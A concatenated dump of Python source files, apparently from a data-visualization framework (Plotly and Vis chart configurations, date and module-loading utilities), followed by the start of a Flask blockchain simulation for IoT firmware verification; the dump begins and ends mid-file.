$('#%(htmlId)s_tags').append("<span style='margin:2px;background:%(baseColor)s;color:%(whiteColor)s;border-radius:8px;1em;vertical-align:middle;display:inline-block;padding:0 2px 1px 10px;cursor:pointer'>"+ %(jsData)s +"<i onclick='RemoveSelection($(this), \\\"%(htmlId)s\\\")' style='margin-left:10px' class='far fa-times-circle'></i></span>");} ;
''' % {"htmlId": self.htmlId, "jsData": jsData, 'breadCrumVar': self.aresObj.jsGlobal.breadCrumVar, 'whiteColor': self.getColor('greyColor', 0), "baseColor": self.getColor("baseColor", 0)}
def __str__(self):
return '''
<div %(attr)s>
<div style='margin:0;display:inline-block;vertical-align:middle;width:90px;float:left;padding:2px 5px 0 5px;height:30px;border:1px solid %(greyColor)s'>
<i class="%(icon)s" style="margin-right:10px"></i>%(title)s</div>
<div id='%(htmlId)s_tags' style='padding:2px 5px 0 5px;border:1px solid %(greyColor)s;height:30px'></div>
</div>''' % {"attr": self.strAttr(pyClassNames=self.pyStyle), "title": self.title, 'icon': self.icon, 'htmlId': self.htmlId, 'greyColor': self.getColor("greyColor", 2) }
```
#### File: js/configs/JsConfigPlotly.py
```python
from ares.Lib.js.configs import JsConfig
DSC = {
}
class JsBase(JsConfig.JsConfig):
""" Base Class for the Plotly Charts """
listAttributes = []
jsCls = 'Chart'
reference = None # The main link to get the documentation of this chart
_statics = None # Static configuration will be added to each dara set automatically
_layout = None # Change the layout properties of the chart
jsType = None # Attach the chart to a family for the data transformation
def __init__(self, aresObj, data, seriesProperties):
super(JsBase, self).__init__(aresObj, data, seriesProperties)
for key, val in self._attrs.items():
self.seriesProperties.setdefault('static', {})[key] = val
self.config()
def config(self):
if self._statics is not None:
self.seriesProperties["static"].update(self._statics)
def _colors(self, cList, index=None):
"""
:category: Chart Colors
:rubric: JS
:type: Configuration
:dsc:
Internal function to allow the change of colors of the different series in a Plotly chart.
Plotly configuration is using the internal variable seriesProperties in order to add the properties once
the Javascript function has aggregated the different values.
"""
if index is not None:
if not "marker" in self.__chart.seriesProperties["static"]:
self.seriesProperties["static"]["marker"] = {'color': [cList]}
else:
for i in range(len(self.data._schema['out']['params'][0])):
self.seriesProperties["dynamic"].setdefault(i, {})["marker"] = {'color': cList[i]}
# ---------------------------------------------------------------------------------------------------------
# Plotly Configurations
# ---------------------------------------------------------------------------------------------------------
class JsBar(JsBase):
""" Configuration for a Bars Chart in Plotly """
alias = 'bar'
name = 'Bars'
_attrs = {'type': 'bar'}
reference = "https://plot.ly/javascript/bar-charts/"
class JsHBar(JsBase):
""" Configuration for a Horizontal Bars Chart in Plotly """
alias = 'hbar'
name = 'Horizontal Bars'
_attrs = {'orientation': 'h', 'type': 'bar'}
reference = "https://plot.ly/javascript/bar-charts/"
class JsPie(JsBase):
""" Configuration for a Pie Chart in Plotly """
alias = 'pie'
name = 'Pie'
_attrs = {'type': 'pie'}
reference = 'https://plot.ly/javascript/pie-charts/'
def _colors(self, cList, index=None):
"""
:category: Chart Series Colors
:rubric: JS
:type: Configuration
:dsc:
"""
if index is not None:
if not "marker" in self.__chart.seriesProperties["static"]:
self.seriesProperties["static"]["marker"] = {'colors': cList}
else:
for i in range(len(self.data._schema['out']['params'][0])):
self.seriesProperties["dynamic"].setdefault(i, {})["marker"] = {'colors': cList}
class JsDonut(JsPie):
""" Configuration for a Donut Chart in Plotly """
alias = 'donut'
name = 'Donut'
_attrs = {'hole': '.4', 'type': 'pie'}
reference = 'https://plot.ly/javascript/pie-charts/'
#---------------------------------------------------------------------------------------------------------
# LINE CHARTS
#
class JsMulti(JsBase):
""" Configuration for a Multi Chart in Plotly """
alias = 'multi'
name = 'Multi Series'
_attrs = {'type': 'scatter'}
class JsLine(JsBase):
""" Configuration for a Linea Chart in Plotly """
alias = 'line'
name = 'Line Series'
_attrs = {'type': 'scatter'}
class JsScatter(JsBase):
""" Configuration for a Scatter Chart in Plotly """
alias = 'scatter'
name = 'Scatter Series'
_attrs = {'mode': 'markers+text', 'type': 'scatter'}
class JsArea(JsBase):
""" Configuration for a Horizontal Bars Chart in Plotly """
alias = 'area'
name = 'Area Series'
_attrs = {'fill': 'tonexty', 'mode': 'none'}
class JsBubble(JsBase):
""" Configuration for a Bubble Chart in Plotly """
alias = 'bubble'
name = 'Bubble Chart'
_attrs = {'mode': 'scatter'}
def config(self):
for i in range(len(self.data._schema['out']['params'][0])):
self.seriesProperties['dynamic'][i] = {'marker': {'size': [1, 4, 50]}, 'mode': 'markers'}
#---------------------------------------------------------------------------------------------------------
# STATISTIC CHARTS
#
class JsBox(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'box'
name = 'Basic Box Series'
_attrs = {'type': 'box'}
reference = "https://plot.ly/javascript/box-plots/"
_statics = {"boxpoints": 'all'}
class JsHBox(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'hbox'
name = 'Horizontal Box Series'
_attrs = {'type': 'box'}
reference = "https://plot.ly/javascript/box-plots/"
class JsSankey(JsBase):
""" Configuration for a Sankey Chart in Plotly """
alias = 'sankey'
name = 'Sankey Series'
_attrs = {'type': 'sankey'}
reference = "https://plot.ly/javascript/sankey-diagram/"
class JsParallelCoordinates(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'parcoords'
name = 'Parallel Coordinates Series'
_attrs = {'type': 'parcoords'}
reference = "https://plot.ly/javascript/parallel-coordinates-plot/"
class JsParallelCategory(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'parcats'
name = 'Basic Parallel Categories Diagram'
_attrs = {'type': 'parcats'}
reference = "https://plot.ly/javascript/parallel-categories-diagram/"
#---------------------------------------------------------------------------------------------------------
# MAPS / HEATMAPS CHARTS
#
class JsMaps(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'choropleth'
name = 'Country GDP Choropleth Map'
_attrs = {'type': 'choropleth', "locationmode": 'country names', "autocolorscale": False,}
reference = "https://plot.ly/javascript/choropleth-maps/"
class JsMapsEurope(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'europe'
jsType = 'choropleth'
name = 'Country GDP Choropleth Map'
_attrs = {'type': 'choropleth', "locationmode": 'country names', "autocolorscale": False,}
reference = "https://plot.ly/javascript/choropleth-maps/"
_layout = {"geo": {"showland": True, "projection": {"type": "Mercator"}, "scope": "europe", "showcoastlines": True, "showframe": True}}
class JsHeatMap(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'heatmap'
name = 'Basic Parallel Categories Diagram'
_attrs = {'type': 'heatmap', 'showscale': False}
reference = "https://plot.ly/javascript/heatmaps/"
#---------------------------------------------------------------------------------------------------------
# 3D CHARTS
#
class JsSurface(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'surface'
name = 'Surface Plot'
_attrs = {'type': 'surface', 'opacity': 0.9}
reference = "https://plot.ly/javascript/3d-surface-plots/"
class JsSurfaceBorder(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'surface-contours'
name = 'Surface Plot'
_attrs = {'type': 'surface'}
reference = "https://plot.ly/javascript/3d-surface-plots/"
_statics = {'contours': {'z': {
'show': True, 'usecolormap': True, 'highlightcolor': "#42f462", 'project':{ 'z' : True}}}}
class JsScatter3D(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'scatter3d'
name = '3D Point Clustering'
_attrs = {'type': 'scatter3d'}
reference = "https://plot.ly/javascript/3d-point-clustering/"
_layout = {'showlegend': False}
def _colors(self, cList, indices=None):
"""
:category: Chart Series Colors
:rubric: JS
:type: Configuration
:dsc:
"""
if indices is not None:
if not isinstance(indices, list):
indices, cList = [indices], [cList]
for i, index in enumerate(indices):
self.seriesProperties["dynamic"][index]["marker"].update({'color': cList[i]})
else:
for i in range(len(self.data._schema['out']['params'][0])+1):
self.seriesProperties["dynamic"].setdefault(i, {})["marker"] = {'color': cList[i]}
class JsLine3D(JsScatter3D):
""" Configuration for a Box Chart in Plotly """
alias = 'line3d'
jsType = 'scatter3d'
name = '3D Point Clustering'
_attrs = {'type': 'scatter3d', 'opacity': 1, 'mode': 'lines'}
class JsMesh3D(JsScatter3D):
""" Configuration for a Box Chart in Plotly """
alias = 'mesh3d'
name = '3D Clustering'
_attrs = {'type': 'mesh3d'}
reference = "https://plot.ly/javascript/3d-point-clustering/"
_layout = {'showlegend': False, 'autosize': True}
_statics = {'opacity': 0.1}
if __name__ == "__main__":
configObj = JsBar(None, [], {})
#lineChart.addAttr('pattern', ['yellow'], 'color')
print(configObj)
```
#### File: js/configs/JsConfig.py
```python
import json
import importlib
import inspect
import sys
from ares.Lib.js import AresJsEncoder
factory = None
def getConfigs(libraries):
"""
:category: Factory
:rubric: JS
:type: Configuration
:dsc:
Load the factory with all the different javascript configuration for the different HTML components.
Some components like charts, tables, pivot and lists are bespoke and would require extra tuning according to the need.
This module in the framework will segregate all the different official configurations. Some bespoke ones can be
added in the reports using the available hooks for each type of components
:return: The content of the factory
"""
global factory
if factory is None:
tmpFactory = {}
for libConfig in libraries:
chartMod = importlib.import_module('ares.Lib.js.configs.JsConfig%s' % libConfig)
for name, chartCls in inspect.getmembers(sys.modules[chartMod.__name__]):
chartAlias = getattr(chartCls, 'alias', None)
if chartAlias is not None:
if chartAlias in tmpFactory.get(libConfig, {}):
raise Exception("Duplicated Name - Chart %s in %s cannot be replaced !!!" % (chartAlias, libConfig))
tmpFactory.setdefault(libConfig, {})[chartAlias] = chartCls
factory = tmpFactory
return factory
def getConfig(pyCls, chartFam):
"""
:category: Chart Bespoke Configuration
:rubric: JS
:type: Framework Extension
:example: aresObj.addChartConfig(JsTestHBar, 'ChartJs')
:dsc:
Entry point to allow the add of bespoke configurations. Those configurations should be linked to an alias which has
to be unique. From this entry point it is not possible to update existing configurations.
Those configurations should follow the defined class structure in order to be then easily added to the framework in the
next release.
The entry point of this function in the framework is in the function aresObj.addChartConfig in the framework
"""
chartMod = importlib.import_module('ares.Lib.js.configs.JsConfig%s' % chartFam)
return type(pyCls.__name__, (pyCls, chartMod.JsBase), {})
class JsConfig(dict):
"""
:category: Javascript Wrapper
:rubric: JS
:type: System
:dsc:
Base class in charge of the conversion of Python configurations to Javascript ones.
Those configurations defined on the Python side will only be used and visible on the Javascript.
This class will build a dictionary of valid parameters for the Javascript layer.
## Class Parameters
- aresObj: The uniq AReS object, shared with all the different objects in the framework
- seriesProperties: Dictionary with configuration to be added after the Javascript data transformation to the object
- data: The Python data structure which will be added to the data section of the Javascript chart
## Special static class variables
Those variable are properties of the class and should not be changed directly. Some methods are available
in order to add bespoke configuration to the chart or to the series like addAttr() and addSeriesAttr().
If something seems to be missing, please never change those variable and either create a new bespoke configuration
or talk to your IT team.
- _attrs, Chart properties and styles
- _statics, parameters added to each series at the end of the data build
The different Javascript structure are defined by the charting libraries
"""
def __init__(self, aresObj, data, seriesProperties):
self.aresObj, self.seriesProperties = aresObj, seriesProperties
resolvedAttrs = {}
self.rAttr(self._attrs, resolvedAttrs)
if getattr(self, '_statics', None) is not None:
seriesProperties.setdefault('static', {}).update(self._statics)
self.update(resolvedAttrs)
self.data = self.transformation(data)
self.config()
def config(self): pass
def rAttr(self, srcVals, dstVals, srcKey=None):
"""
:category:
:rubric: PY
:type: System
:dsc:
"""
if isinstance(srcVals, dict):
for key, val in srcVals.items():
if isinstance(val, dict):
dstVals[key] = {}
self.rAttr(val, dstVals[key])
else:
self.rAttr(val, dstVals, key)
elif isinstance(srcVals, list):
dstVals[srcKey] = []
for val in srcVals:
dstVals[srcKey].append({})
self.rAttr(val, dstVals[srcKey][-1])
else:
if srcKey is not None:
if isinstance(srcVals, str):
if srcVals.startswith("function") or srcVals.startswith("JSON.stringify"):
dstVals[srcKey] = srcVals
else:
dstVals[srcKey] = json.dumps(srcVals)
else:
dstVals[srcKey] = json.dumps(srcVals)
elif isinstance(dstVals, list):
dstVals.append(json.dumps(srcVals))
def toJs(self, options=None): return self
@classmethod
def transformation(cls, data):
"""
:category: Data Transformation
:rubric: PY
:type: Transformation
:dsc:
Data transformation for the DataFrame. Using this function might create a new DataFrame. Thus a new Javascript
object will be created and the logic within the global filters might not work correctly.
If you use this, please make it obvious to ensure other users might not be surprised
"""
return data
def addAttr(self, key, val, tree=None, category=None, isPyData=True):
if isinstance(key, dict):
for k, v in key.items():
self.addAttr.addAttr(k, v, category=category, isPyData=isPyData)
if isPyData:
val = json.dumps(val, cls=AresJsEncoder.AresEncoder)
if category is None and tree is not None:
category, tree = tree, None
if tree is not None:
chartLocation = self[category]
if not isinstance(tree, list):
tree = [tree]
for subCategory in tree:
if isinstance(subCategory, tuple):
subCategory, subCategoryIndex = subCategory
else:
subCategory, subCategoryIndex = subCategory, 0
if subCategory in self.listAttributes:
if not subCategory in chartLocation:
chartLocation[subCategory] = []
for i in range(subCategoryIndex + 1):
chartLocation[subCategory].append({})
if len(chartLocation[subCategory]) < subCategoryIndex + 1:
for i in range(subCategoryIndex + 1):
if i not in chartLocation[subCategory]:
chartLocation[subCategory].append({})
chartLocation = chartLocation[subCategory][subCategoryIndex]
else:
if not subCategory in chartLocation:
chartLocation[subCategory] = {}
chartLocation = chartLocation[subCategory]
if isinstance(chartLocation, list):
chartLocation[0][key] = val
else:
chartLocation[key] = val
elif category is not None:
self.setdefault(category, {})[key] = val
else:
self[key] = val
def delAttr(self, keys, tree=None, category=None):
""" """
chart = self
if tree is not None:
chartLocation = self.get(category, {})
for subCategory in tree:
chartLocation = chartLocation.get(subCategory, {})
chart = chartLocation
if category is not None:
chart = self.get(category, {})
for attr in keys:
if attr in chart:
del chart[attr]
def _colors(self, cList, index=None):
"""
:category: Chart Series Colors
:rubric: JS
:type: Configuration
:dsc:
"""
if index is None:
for i in range(len(self.data._schema['values'])):
if len(cList) > i:
self.seriesProperties['dynamic'].setdefault(i, {})['backgroundColor'] = cList[i]
else:
self.seriesProperties['dynamic'].setdefault(index, {})['backgroundColor'] = cList
if __name__ == "__main__":
print(getConfigs(['ChartJs']))
```
#### File: js/configs/JsConfigVis.py
```python
from ares.Lib.js.configs import JsConfig
DSC = {
}
class JsBase(JsConfig.JsConfig):
""" Base Class for the Plotly Charts """
jsCls = 'Graph2d'
reference = None # The main link to get the documentation of this chart
_statics = None # Static configuration will be added to each dara set automatically
jsType = None # Attach the chart to a family for the data transformation
_attrs = None
jsQueryData = '{xaxis: event.time, column: event.value[0], src: event}'
def __init__(self, aresObj, data, seriesProperties):
super(JsBase, self).__init__(aresObj, data, seriesProperties)
self.config()
def config(self):
if self._statics is not None:
self.seriesProperties["static"].update(self._statics)
@property
def options(self):
return self
# ---------------------------------------------------------------------------------------------------------
# VIS Configurations
# ---------------------------------------------------------------------------------------------------------
class JsBar(JsBase):
""" Configuration for a Bars Chart in Vis """
alias = 'bar'
name = 'Bars'
_attrs = {'style': 'bar', 'moveable': False, 'drawPoints': True, 'stack': False, 'orientation': 'top',
'barChart': {'align': 'center', 'sideBySide': True},
'dataAxis': {'icons': True}}
reference = "http://visjs.org/examples/graph2d/11_barsSideBySideGroups.html"
class JsLine(JsBase):
""" Configuration for a Bars Chart in Vis """
alias = 'line'
name = 'Line Plot'
_attrs = {'style': 'line', 'moveable': False, 'drawPoints': False}
reference = "http://visjs.org/examples/graph2d/01_basic.html"
class JsScatter(JsBase):
""" Configuration for a Bars Chart in Vis """
alias = 'scatter'
name = 'Scatter Plot'
_attrs = {'style': 'points', 'sampling': True, 'sort': False, 'defaultGroup': 'Scatterplot', 'moveable': False}
reference = "http://visjs.org/examples/graph2d/18_scatterplot.html"
#---------------------------------------------------------------------------------------------------------
# 3D CHARTS
#
class JsSurface(JsBase):
""" Configuration for a Box Chart in Vis """
jsCls = 'Graph3d'
alias = 'surface'
name = 'Surface Plot'
_attrs = {'style': 'surface', 'keepAspectRatio': True, 'verticalRatio': 0.5, 'showPerspective': True,
'showGrid': True, 'showShadow': False, #, 'height': '100%'
'backgroundColor': { 'strokeWidth': 0},
}
reference = "http://visjs.org/graph3d_examples.html"
class JsScatter3D(JsBase):
jsCls = 'Graph3d'
alias = 'scatter3d'
_attrs = {'tooltip': True}
reference = "http://visjs.org/examples/graph3d/07_dot_cloud_colors.html"
class JsBubble3D(JsBase):
jsCls = 'Graph3d'
alias = 'bubble'
_attrs = {'style': 'dot-size', 'tooltip': True, 'keepAspectRatio': True, 'showPerspective': True}
reference = "http://visjs.org/examples/graph3d/07_dot_cloud_colors.html"
class JsGroup3D(JsBase):
alias = 'series3d'
jsType = 'bubble'
_attrs = {'style': 'dot-color', 'keepAspectRatio': True, 'showPerspective': True, 'verticalRatio': 0.5, 'tooltip': True,
'showGrid': True, 'showShadow': False, 'legendLabel': 'color value', 'showLegend': False}
reference = "http://visjs.org/examples/graph3d/07_dot_cloud_colors.html"
class JsLine3D(JsScatter3D):
jsCls = 'Graph3d'
alias = 'line3d'
_attrs = {'style': 'line', 'tooltip': True}
reference = "http://visjs.org/examples/graph3d/05_line.html"
class JsBar3D(JsScatter3D):
jsCls = 'Graph3d'
alias = 'bar3d'
_attrs = {'style': 'bar', 'tooltip': True}
reference = "http://visjs.org/examples/graph3d/12_custom_labels.html"
class JsBarColor3D(JsScatter3D):
alias = 'barSeries3d'
jsType = 'bubble'
_attrs = {'style': 'bar-color', 'tooltip': True}
reference = "http://visjs.org/examples/graph3d/12_custom_labels.html"
#---------------------------------------------------------------------------------------------------------
# TIMELINE CHARTS
#
class JsTimeLine(JsBase):
alias = 'timeline'
jsCls = 'Timeline'
name = 'Basic Timeline'
reference = "http://visjs.org/examples/timeline/basicUsage.html"
#---------------------------------------------------------------------------------------------------------
# NETWORK CHARTS
#
class JsNetwork(JsBase):
jsCls = 'Network'
alias = 'network'
name = 'Basic Network'
reference = "http://visjs.org/examples/network/basicUsage.html"
```
#### File: ares-visual/utils/AresFncs.py
```python
import os
import inspect
import importlib
import logging
from ares.Lib import AresMarkDown
DSC = {
'eng': '''
Section dedicated to the functions. The below functions are system functions and are available in all the reports.
It is possible to extend this by adding report functions specific to your environment. Those functions will be then added to the aresObj automatically.
It will be possible to use them then directly.
In order to get the functions loaded it is important to get the structure in the report:
/fncs
_ _init_ _.py
NewFncs.py
It is possible to add multiple functions in the same module. The functions should have the below structure:
And please add the below documentation type to your functions. They will then be available here for the community !
It is possible to get functions from other environments by using the below line of code:
'''
}
def create(aresObj):
"""
:category:
:rubric: PY
:type: System
:dsc:
Load the System utility functions defined in the AReS core framework
:return: A dictionary with the list of available functions
"""
fncs = {}
for script in os.listdir(os.path.dirname(__file__)):
if (script == "AresFncs.py") or (script == "__init__.py") or not script.endswith(".py"):
continue
mod = importlib.import_module('ares.utils.%s' % script.replace(".py", ""))
functions_list = [o for o in inspect.getmembers(mod) if inspect.isfunction(o[1])]
for fncName, fnc in functions_list:
fncs[fncName] = fnc
if aresObj.run.local_path not in ("", None):
fncsPath = os.path.join(aresObj.run.local_path, 'fncs')
if os.path.exists(fncsPath):
for script in os.listdir(fncsPath):
if script.endswith('.py') and script != "__init__.py":
try:
mod = importlib.import_module('%s.fncs.%s' % (aresObj.run.report_name, script.replace(".py", "")))
functions_list = [o for o in inspect.getmembers(mod) if inspect.isfunction(o[1])]
for fncName, fnc in functions_list:
fncs[fncName] = fnc
except Exception as err:
logging.warning("%s, error %s" % (script, err))
# Add the Hash ID function
mod = importlib.import_module('ares.utils.AresSiphash')
fncs["hashId"] = mod.SipHash().hashId
return fncs
def docEnum(aresObj, outStream, lang='eng'):
"""
:category: Functions
:rubric: PY:
:type: Configuration
"""
fncsFactory = create(aresObj)
outStream.append(DSC.get(lang, DSC.get('eng', '')))
for alias, fnc in fncsFactory.items():
docDetails = AresMarkDown.AresMarkDown.loads(fnc.__doc__)
if 'tip' in docDetails:
outStream.title("%s ares:info<%s>" % (alias, "".join( docDetails['tip'])), level=3)
else:
outStream.title(alias, level=2)
outStream.append(docDetails.getAttr('dsc'))
outStream.title('Examples', level=4)
outStream.code(docDetails.getAttr('example'))
varNames = inspect.getargspec(fnc).args
if len(varNames) > 0:
outStream.title('Arguments', level=4)
for varName in varNames:
if varName == 'self':
continue
outStream.append("%s: %s" % (varName, outStream.params(varName)))
# Return the list of environments with functions
outStream.title("Environments with bespoke functions", level=2)
if hasattr(aresObj, 'reportsPath'):
header = ['Environment', 'Module', 'Functions']
data = []
for path in aresObj.reportsPath.values():
if os.path.exists(path):
for folder in os.listdir(path):
if os.path.exists( os.path.join(path, folder, 'fncs')) :
for file in os.listdir( os.path.join(path, folder, 'fncs') ):
if file != '__init__.py' and file.endswith('.py'):
fncNames = []
mod = importlib.import_module('%s.fncs.%s' % (folder, file.replace(".py", "")))
for o in inspect.getmembers(mod):
if inspect.isfunction(o[1]):
fncNames.append( o[0] )
data.append([folder, file, ",".join(fncNames)])
outStream.table(header, data)
outStream.src(__file__)
```
#### File: ares-visual/utils/AresUtilities.py
```python
import datetime
import traceback
import sys
import importlib
import types
import re
regex = re.compile('[^a-zA-Z0-9_]')
def cleanData(value):
""" Function to clean the javascript data to allow the use of variables """
return regex.sub('', value.strip())
def getDateFromAlias(aliaDt, fromDt=None):
"""
:category: Python Utilities - Date function
:example: getDateFromAlias("T")
:icon: fab fa-python
:dsc:
Return the date corresponding to an alias code like T, T-N, M...
:return: The converted date or a list of dates
"""
if fromDt is None:
cobDate = datetime.datetime.today()
else:
cobDate = datetime.datetime( *map( lambda x: int(x), fromDt.split("-") ) )
if len(aliaDt) > 1:
fType, fCount = aliaDt[0], "".join(aliaDt[2:])
else:
fType, fCount = aliaDt, 0
if fType == 'T':
for i in range(0, int(fCount) + 1):
if len(aliaDt) > 1:
if aliaDt[1] == '+':
cobDate = cobDate + datetime.timedelta(days=1)
while cobDate.weekday() in [5, 6]:
cobDate = cobDate + datetime.timedelta(days=1)
else:
cobDate = cobDate - datetime.timedelta(days=1)
while cobDate.weekday() in [5, 6]:
cobDate = cobDate - datetime.timedelta(days=1)
return cobDate.strftime('%Y-%m-%d')
if fType == 'M':
endMontDate = datetime.datetime(cobDate.year, cobDate.month - int(fCount), 1)
endMontDate = endMontDate - datetime.timedelta(days=1)
while endMontDate.weekday() in [5, 6]:
endMontDate = endMontDate - datetime.timedelta(days=1)
return endMontDate.strftime('%Y-%m-%d')
if fType == 'W':
cobDate = cobDate - datetime.timedelta(days=1)
while cobDate.weekday() != 4:
cobDate = cobDate - datetime.timedelta(days=1)
cobDate = cobDate - datetime.timedelta(days=(int(fCount) * 7))
return cobDate.strftime('%Y-%m-%d')
if fType == 'Y':
endYearDate = datetime.datetime(cobDate.year - int(fCount), 1, 1)
endYearDate = endYearDate - datetime.timedelta(days=1)
while endYearDate.weekday() in [5, 6]:
endYearDate = endYearDate - datetime.timedelta(days=1)
return endYearDate.strftime('%Y-%m-%d')
return aliaDt
def getDates(fromDt, toDt, weekdays=True):
"""
:category: Python Utilities - Python Date function
:example: aresObj.getDates("2018-02-01", "2018-01-01")
:icon: fab fa-python
:dsc:
get the list of dates between two dates
:return: A list of string dates in the common AReS format YYYY-MM-DD
"""
resDt = []
startDt = getDateFromAlias(fromDt)
endDt = getDateFromAlias(toDt, fromDt=startDt)
dt = datetime.datetime( *map(lambda x: int(x), startDt.split('-')))
tgDt = datetime.datetime( *map(lambda x: int(x), endDt.split('-')))
resDt.append(startDt)
while dt > tgDt:
dt = dt - datetime.timedelta(days=1)
if not dt.weekday() in [5, 6] or not weekdays:
resDt.append( dt.strftime('%Y-%m-%d') )
return resDt
def getDateFromXl(xlDate):
"""
:category: Python Utilities - Python Date function
:example: aresObj.getDateFromXl(42948)
:icon: fab fa-python
:dsc:
Convert a Excel date to a AReS standard date format YYYY-MM-DD.
:return: The date as a String in the common format YYYY-MM-DD in AReS
"""
dt = datetime.datetime.fromordinal(datetime.datetime(1900, 1, 1).toordinal() + xlDate - 2)
return dt.strftime('%Y-%m-%d')
def fakefunction(*args, **kwargs):
"""
:dsc: Simple wrapper to attache this to classes of module when we end up with a fake attribute
"""
return None
def parseAttrError():
"""
:dsc: Parse and fix AttributeError Exceptions
"""
current_mod = None
trace = traceback.format_exc().strip().split('\n')
missing_attr = trace[-2].strip()
if missing_attr.lstrip().startswith('class '):
missing_attr = missing_attr.split('(')[1].split(')')[0]
elif ' as ' in missing_attr:
missing_attr = missing_attr.split()[1]
elif ' ' in missing_attr:
missing_attr = missing_attr.split()[-1]
if '=' in missing_attr:
missing_attr = missing_attr.split('=')[-1]
for i, attr in enumerate(missing_attr.split('.')):
if i == 0:
current_mod = sys.modules[attr]
continue
if '(' in attr:
attr = attr.split('(')[0]
setattr(current_mod, attr, staticmethod(fakefunction))
continue
setattr(current_mod, attr, type(attr, (object,), {}))
current_mod = getattr(current_mod, attr)
def parseImportError():
"""
:dsc: Parse and fix ImportError Exceptions
"""
error_line = traceback.format_exc().strip().split('\n')[-2]
missing_names = []
if 'from' in error_line:
missing_mod = error_line.strip().split()[1]
missing_names = [attr.strip() for attr in ''.join(error_line.strip().split()[3:]).split(',')]
else:
missing_mod = error_line.strip().split()[-1]
previous_mod = []
for module in missing_mod.split('.'):
previous_mod.append(module)
current_mod = '.'.join(previous_mod)
if current_mod in sys.modules:
for attr in missing_names:
setattr(sys.modules[current_mod], attr, type(attr, (object,), {}))
continue
try:
importlib.import_module(current_mod)
except:
mod = types.ModuleType(current_mod)
for attr in missing_names:
setattr(mod, attr, type(attr, (object,), {}))
sys.modules[mod.__name__] = mod
def parse_error(file, error):
"""
:dsc: import required module in python and handles error by creating fake modules on the fly
We just use a counter here to make sure we get out of the loop after 99 tries
"""
counter = 0
while error:
counter += 1
if 'ImportError' in error.strip().split('\n')[-1]:
parseImportError()
elif 'AttributeError' in error.strip().split('\n')[-1]:
parseAttrError()
try:
mod = importlib.import_module(file.replace('.py', ''))
error = None
except ImportError as e:
error = traceback.format_exc()
except AttributeError as e:
error = traceback.format_exc()
if counter > 99:
return {}
return mod
```
#### File: ares-visual/utils/OrderedSet.py
```python
class OrderedSet(list):
"""
:category: Sets
:rubric: PY
:type: System
:dsc:
Create a ordered set object
"""
def __init__(self):
super(OrderedSet, self).__init__()
def add(self, key):
"""
:param key:
:return:
"""
if key not in self:
self.append(key)
```
|
{
"source": "JeaMinLim/ChainVeri_Sim",
"score": 3
}
|
#### File: JeaMinLim/ChainVeri_Sim/ChainVeri_sim.py
```python
import hashlib
import json
from time import time
from urllib.parse import urlparse
from uuid import uuid4
import os
import requests
from flask import Flask, jsonify, request
from datetime import datetime
import logging
import logging.handlers
from operator import eq
class Blockchain:
# Initalize ChainVeri Blockchain
def __init__(self):
self.verification_info = []
self.chain = []
self.nodes = set()
# Create the genesis block
self.new_block(previous_hash='1', proof=100)
def register_node(self, address):
"""
Add a new node to the list of nodes
:param address: Address of node. Eg. 'http://192.168.0.5:5000'
"""
parsed_url = urlparse(address)
if parsed_url.netloc:
self.nodes.add(parsed_url.netloc)
elif parsed_url.path:
# Accepts an URL without scheme like '192.168.0.5:5000'.
self.nodes.add(parsed_url.path)
else:
raise ValueError('Invalid URL')
def valid_chain(self, chain):
"""
Determine if a given blockchain is valid
:param chain: A blockchain
:return: True if valid, False if not
"""
last_block = chain[0]
current_index = 1
while current_index < len(chain):
block = chain[current_index]
print(f'{last_block}')
print(f'{block}')
print("\n-----------\n")
# Check that the hash of the block is correct
if block['previous_hash'] != self.hash(last_block):
return False
# Check that the Proof of Work is correct
if not self.valid_proof(last_block['proof'], block['proof'], last_block['previous_hash']):
return False
last_block = block
current_index += 1
return True
def resolve_conflicts(self):
"""
This is our consensus algorithm, it resolves conflicts
by replacing our chain with the longest one in the network.
:return: True if our chain was replaced, False if not
"""
neighbours = self.nodes
new_chain = None
# We're only looking for chains longer than ours
max_length = len(self.chain)
# Grab and verify the chains from all the nodes in our network
for node in neighbours:
response = requests.get(f'http://{node}/chain')
if response.status_code == 200:
length = response.json()['length']
chain = response.json()['chain']
# Check if the length is longer and the chain is valid
if length > max_length and self.valid_chain(chain):
max_length = length
new_chain = chain
# Replace our chain if we discovered a new, valid chain longer than ours
if new_chain:
self.chain = new_chain
return True
return False
def new_block(self, proof, previous_hash):
"""
Create a new Block in the Blockchain
:param proof: The proof given by the Proof of Work algorithm
:param previous_hash: Hash of previous Block
:return: New Block
"""
block = {
'index': len(self.chain) + 1,
'timestamp': time(),
'transactions': self.verification_info,
'proof': proof,
'previous_hash': previous_hash or self.hash(self.chain[-1]),
'type': 1,
}
# Reset the current list of transactions
self.verification_info = []
self.chain.append(block)
return block
def new_verification(self, sender, model, firmware, version):
"""
Creates a new verification info to go into the next mined Block
:param sender: Address of the Sender(UUID or Public Key eta.)
:param model: name of IoT device model
:param firmware: The hash value of firmware
:param version: firmware version
:return: The index of the Block that will hold this transaction
"""
self.verification_info.append({
'sender': sender,
'model': model,
'firmware': firmware,
'version': version
})
return self.last_block['index'] + 1
@property
def last_block(self):
return self.chain[-1]
@staticmethod
def hash(block):
"""
Creates a SHA-256 hash of a Block
:param block: Block
"""
# We must make sure that the Dictionary is Ordered, or we'll have inconsistent hashes
block_string = json.dumps(block, sort_keys=True).encode()
return hashlib.sha256(block_string).hexdigest()
def proof_of_work(self, last_block):
"""
Simple Proof of Work Algorithm:
- Find a number p' such that hash(pp') contains leading 4 zeroes
- Where p is the previous proof, and p' is the new proof
:param last_block: <dict> last Block
:return: <int>
"""
last_proof = last_block['proof']
last_hash = self.hash(last_block)
proof = 0
while self.valid_proof(last_proof, proof, last_hash) is False:
proof += 1
return proof
@staticmethod
def valid_proof(last_proof, proof, last_hash):
"""
Validates the Proof
:param last_proof: <int> Previous Proof
:param proof: <int> Current Proof
:param last_hash: <str> The hash of the Previous Block
:return: <bool> True if correct, False if not.
"""
guess = f'{last_proof}{proof}{last_hash}'.encode()
guess_hash = hashlib.sha256(guess).hexdigest()
return guess_hash[:4] == "0000"
# Instantiate the Node
app = Flask(__name__)
